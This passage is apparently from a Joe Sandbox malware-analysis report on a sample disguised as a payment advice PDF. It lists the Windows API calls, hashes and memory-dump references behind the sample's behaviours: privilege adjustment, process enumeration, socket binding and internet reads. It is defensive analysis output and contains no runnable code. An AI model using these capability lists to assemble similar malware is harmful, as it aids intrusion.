                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 1300846289-0
                                                              • Opcode ID: f14776eb9890f43280986085c4bb91bdc2f3994c781412d5850d91366d893695
                                                              • Instruction ID: 6bb9d8f4b782ead0e0f5bf196cdc50af36162a6b15acdb98378fc33641dabc37
                                                              • Opcode Fuzzy Hash: f14776eb9890f43280986085c4bb91bdc2f3994c781412d5850d91366d893695
                                                              • Instruction Fuzzy Hash: 1B029DB0A00209DFCF04EF68D991AAEBBF5FF44304F158069E80ADB255EB35D954CB96
                                                              APIs
                                                                • Part of subcall function 00842612: GetWindowLongW.USER32(?,000000EB), ref: 00842623
                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 008419FA
                                                              • GetSysColor.USER32(0000000F), ref: 00841A4E
                                                              • SetBkColor.GDI32(?,00000000), ref: 00841A61
                                                                • Part of subcall function 00841290: DefDlgProcW.USER32(?,00000020,?), ref: 008412D8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ColorProc$LongWindow
                                                              • String ID:
                                                              • API String ID: 3744519093-0
                                                              • Opcode ID: 742a28af6b7eb505f59233ec5a2700006bf97c84919d06165694b0ee30210fee
                                                              • Instruction ID: 433b678b1fe97d128287db3b355b85c9a1bb2d3a096bc5bb054bee67a709b52b
                                                              • Opcode Fuzzy Hash: 742a28af6b7eb505f59233ec5a2700006bf97c84919d06165694b0ee30210fee
                                                              • Instruction Fuzzy Hash: BFA1587111656CBEEE28EE2C8C4CF7F3D6EFB41749B14411AF606D2196EB20CD8096B2
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 008ABCE6
                                                              • _wcscmp.LIBCMT ref: 008ABD16
                                                              • _wcscmp.LIBCMT ref: 008ABD2B
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 008ABD3C
                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 008ABD6C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 2387731787-0
                                                              • Opcode ID: 4a83218464a3563946244544962e3c24ef29c391e8755e709d1c853fcc25a2c5
                                                              • Instruction ID: 6f356f1f8211032158fc185c8ec2a9064fd6b28832af6b1cdb86d304623f67d0
                                                              • Opcode Fuzzy Hash: 4a83218464a3563946244544962e3c24ef29c391e8755e709d1c853fcc25a2c5
                                                              • Instruction Fuzzy Hash: 26518D356046059FE714DF68C490EAAB7E4FF4A324F10462DE956C77A2DB30ED04CB92
                                                              APIs
                                                                • Part of subcall function 008B7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008B7DB6
                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 008B679E
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 008B67C7
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 008B6800
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 008B680D
                                                              • closesocket.WSOCK32(00000000,00000000), ref: 008B6821
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 99427753-0
                                                              • Opcode ID: d2a69c4a64b518ff05a6fa8c37a812dc141073b5059359530f17fbacb4f4b4f3
                                                              • Instruction ID: eff2d8fb1e8cc0f245f2a6445a56db6c2bd3b2996724e6edf9185fd315826069
                                                              • Opcode Fuzzy Hash: d2a69c4a64b518ff05a6fa8c37a812dc141073b5059359530f17fbacb4f4b4f3
                                                              • Instruction Fuzzy Hash: 69419675A00218AFDB60BF288C86F6E77A4FF45714F044568FA59EB3D3DA749D008792
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                              • String ID:
                                                              • API String ID: 292994002-0
                                                              • Opcode ID: a72fcbf367ce0bf7ca0d6d116361d269ff53cd2cf5c76aa54469976e6cd47199
                                                              • Instruction ID: 8b04f7e398870808a7df0bbcb4ecdb793f71b54fb481d2dbf9be076710291e00
                                                              • Opcode Fuzzy Hash: a72fcbf367ce0bf7ca0d6d116361d269ff53cd2cf5c76aa54469976e6cd47199
                                                              • Instruction Fuzzy Hash: 7911B2313009556BEF216F2A9C44F6B7BB9FF857A1B40803CF946D3242DBB0ED4186A5
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008980C0
                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008980CA
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008980D9
                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008980E0
                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008980F6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: 301424c3a20ace0ea814e8200d53d4db25d98e309bf5686c33397e0233ad8424
                                                              • Instruction ID: d4af4b41f3ad9d154516af20d790b0751dd2310d490ca26e2835809c6f4907ae
                                                              • Opcode Fuzzy Hash: 301424c3a20ace0ea814e8200d53d4db25d98e309bf5686c33397e0233ad8424
                                                              • Instruction Fuzzy Hash: 09F04F31240205EFEB115FA5EC8DE673BBDFF4A755B04002AFA46D6151CB719C41DA60
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 008AC432
                                                              • CoCreateInstance.OLE32(008D2D6C,00000000,00000001,008D2BDC,?), ref: 008AC44A
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                              • CoUninitialize.OLE32 ref: 008AC6B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                                              • String ID: .lnk
                                                              • API String ID: 2683427295-24824748
                                                              • Opcode ID: 7aaaa45d86b2d2ce09acb86a843a20116205e1247b65ab369812a84f87ad0f5a
                                                              • Instruction ID: 3a7007ebfcdc677a7bd2e83d81ce1df77729523f327aaac4900a06d4191d7da8
                                                              • Opcode Fuzzy Hash: 7aaaa45d86b2d2ce09acb86a843a20116205e1247b65ab369812a84f87ad0f5a
                                                              • Instruction Fuzzy Hash: 49A11A71104209AFD700EF58C881EAFB7A8FF99354F00492DF195D7192EB71E909CB62
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00844AD0), ref: 00844B45
                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00844B57
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                              • API String ID: 2574300362-192647395
                                                              • Opcode ID: 25322fb02d6bf83de5e5a5f7c5202e860a14770cd99563be43b7e6358681051a
                                                              • Instruction ID: c364b45e069bd348a99d578221db66abb66e5c02649cee65e4736bb2edc59aa3
                                                              • Opcode Fuzzy Hash: 25322fb02d6bf83de5e5a5f7c5202e860a14770cd99563be43b7e6358681051a
                                                              • Instruction Fuzzy Hash: 14D0C730A00B17CFE7208F72E828F02B2F6FF003A0B14C83EA592D2250E774E880CA14
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __itow__swprintf
                                                              • String ID:
                                                              • API String ID: 674341424-0
                                                              • Opcode ID: c95c1bb661bd89f68231cafb24df8a7710b80f824f604ec34cc3eb896b51ec64
                                                              • Instruction ID: 3b8e57510b34ec4c747258ecb47bfc73c582c5025af1b6f9ab6b27d5db809377
                                                              • Opcode Fuzzy Hash: c95c1bb661bd89f68231cafb24df8a7710b80f824f604ec34cc3eb896b51ec64
                                                              • Instruction Fuzzy Hash: A72267716083049BC724EF28C891B6AB7E5FF84354F14492DF99AD7291EB71E908CB92
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 008BEE3D
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 008BEE4B
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 008BEF0B
                                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 008BEF1A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                              • String ID:
                                                              • API String ID: 2576544623-0
                                                              • Opcode ID: cedde2ea168fcb0feb12134ca933550a549645bcea35c3d985cd85bec1a6abf1
                                                              • Instruction ID: b066818754afed489887d460ebc94172052f9e1f69cb1420b3d2cb9a0204e14d
                                                              • Opcode Fuzzy Hash: cedde2ea168fcb0feb12134ca933550a549645bcea35c3d985cd85bec1a6abf1
                                                              • Instruction Fuzzy Hash: A2514D71504715AFD320EF28D885EABBBE8FF94710F50482DF595D72A2EB70A904CB92
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0089E628
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: lstrlen
                                                              • String ID: ($|
                                                              • API String ID: 1659193697-1631851259
                                                              • Opcode ID: b970a0c16decce19a1889cce2af722e6791821f2c32a1258de6406a77167fe15
                                                              • Instruction ID: 6e514308e454298dcf9b3d69d4998309cb481605ba37a4222f32687948f1e205
                                                              • Opcode Fuzzy Hash: b970a0c16decce19a1889cce2af722e6791821f2c32a1258de6406a77167fe15
                                                              • Instruction Fuzzy Hash: 99323575A007059FDB28DF59C48096ABBF1FF58320B15C56EE89ADB3A1E770E941CB40
                                                              APIs
                                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,008B180A,00000000), ref: 008B23E1
                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 008B2418
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                              • String ID:
                                                              • API String ID: 599397726-0
                                                              • Opcode ID: e45b6ddcf17a10fc24c3e5766bc4e903f74191847b4894000385bd9736553e37
                                                              • Instruction ID: 1f1130058eaf4e55232a7789a250180254298b10f92cbfa13ba0a0fb7c512491
                                                              • Opcode Fuzzy Hash: e45b6ddcf17a10fc24c3e5766bc4e903f74191847b4894000385bd9736553e37
                                                              • Instruction Fuzzy Hash: 2441F271A00209BFEB109E99DC81EFFB7FCFB44324F10406AF601E6751DA759E419A65
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 008AB40B
                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 008AB465
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 008AB4B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$DiskFreeSpace
                                                              • String ID:
                                                              • API String ID: 1682464887-0
                                                              • Opcode ID: 1da06e339fa7c2b984a40efed2b3c022fe4bd76542aa25ebe01642920c097b54
                                                              • Instruction ID: a26b4b789a408ab8eeef35490fe0335bb31ed7039f9a98fb85d1dc71952af905
                                                              • Opcode Fuzzy Hash: 1da06e339fa7c2b984a40efed2b3c022fe4bd76542aa25ebe01642920c097b54
                                                              • Instruction Fuzzy Hash: C9216235A00108DFDB00EFA9D880EEEBBB8FF49314F1480AAE945EB352DB319915CB51
                                                              APIs
                                                                • Part of subcall function 00860DB6: std::exception::exception.LIBCMT ref: 00860DEC
                                                                • Part of subcall function 00860DB6: __CxxThrowException@8.LIBCMT ref: 00860E01
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0089882B
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00898858
                                                              • GetLastError.KERNEL32 ref: 00898865
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                              • String ID:
                                                              • API String ID: 1922334811-0
                                                              • Opcode ID: 4503b07f099d8f68ef1eadf5a28f9a0ddbb1c9d88562697d776397e2ab33a849
                                                              • Instruction ID: 12d243dbefd6ee33111692ed59b9b96e284d7fa7389ffa8f4e840f808351cc4b
                                                              • Opcode Fuzzy Hash: 4503b07f099d8f68ef1eadf5a28f9a0ddbb1c9d88562697d776397e2ab33a849
                                                              • Instruction Fuzzy Hash: 9C118FB2514205AFEB18EFA4DC85D6BB7F9FB45710B24862EF455D7241EB30BC408B60
                                                              APIs
                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00898774
                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0089878B
                                                              • FreeSid.ADVAPI32(?), ref: 0089879B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                              • String ID:
                                                              • API String ID: 3429775523-0
                                                              • Opcode ID: 4916f0c6955f774f751d4a6163600e1eb1a91aa7b758cc8dc4eb27bd99d8a92d
                                                              • Instruction ID: 318609c8bdd96ac315eef26f1aef05882d6f744b7be153801176cf508cd3bcfc
                                                              • Opcode Fuzzy Hash: 4916f0c6955f774f751d4a6163600e1eb1a91aa7b758cc8dc4eb27bd99d8a92d
                                                              • Instruction Fuzzy Hash: C9F03C75911209BBEF00DFE49C89EADB7B9FF08601F104469AA01E2182D7715A048B50
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 008AC6FB
                                                              • FindClose.KERNEL32(00000000), ref: 008AC72B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: d504cb2cb598b7a8540455b66d409636ef2b774442dedb67617ef47d5262930d
                                                              • Instruction ID: e6f11e77739477e1e2fa91ef9c79b724a3c667ef78d674108bc080213efbd9af
                                                              • Opcode Fuzzy Hash: d504cb2cb598b7a8540455b66d409636ef2b774442dedb67617ef47d5262930d
                                                              • Instruction Fuzzy Hash: 35115E726006049FDB10EF2DD845A2AF7E9FF85324F04852EF9A9D7291DB30A805CF81
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,008B9468,?,008CFB84,?), ref: 008AA097
                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,008B9468,?,008CFB84,?), ref: 008AA0A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: 2988a6b6ccc805819f9bda5c9fb48ec794f1e0770423385987e19b6fbf8df3df
                                                              • Instruction ID: 9069e496c6fe05f766021efd3dc555d681f0f89aeb094c084b5f7ae6da8c07ff
                                                              • Opcode Fuzzy Hash: 2988a6b6ccc805819f9bda5c9fb48ec794f1e0770423385987e19b6fbf8df3df
                                                              • Instruction Fuzzy Hash: C1F0823551522DBBEB619FA8CC48FEA776DFF09361F008165F909D6581D7309940CBA2
                                                              APIs
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00898309), ref: 008981E0
                                                              • CloseHandle.KERNEL32(?,?,00898309), ref: 008981F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                              • String ID:
                                                              • API String ID: 81990902-0
                                                              • Opcode ID: 20d59b47d53fe0bfa084e1c4ca2f1373b827ba9e036429ebe511aea60bd480f8
                                                              • Instruction ID: 8d3ff3ffaf2694f66efb0b0c2230b424c7a2ab0c641edc50f9581b9225dbf512
                                                              • Opcode Fuzzy Hash: 20d59b47d53fe0bfa084e1c4ca2f1373b827ba9e036429ebe511aea60bd480f8
                                                              • Instruction Fuzzy Hash: 0CE0B672010A21AFEB252B65EC09D777BAAFB04310B15882AB9A6C4471DB72AC91DB14
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00868D57,?,?,?,00000001), ref: 0086A15A
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0086A163
                                                              Memory Dump Source
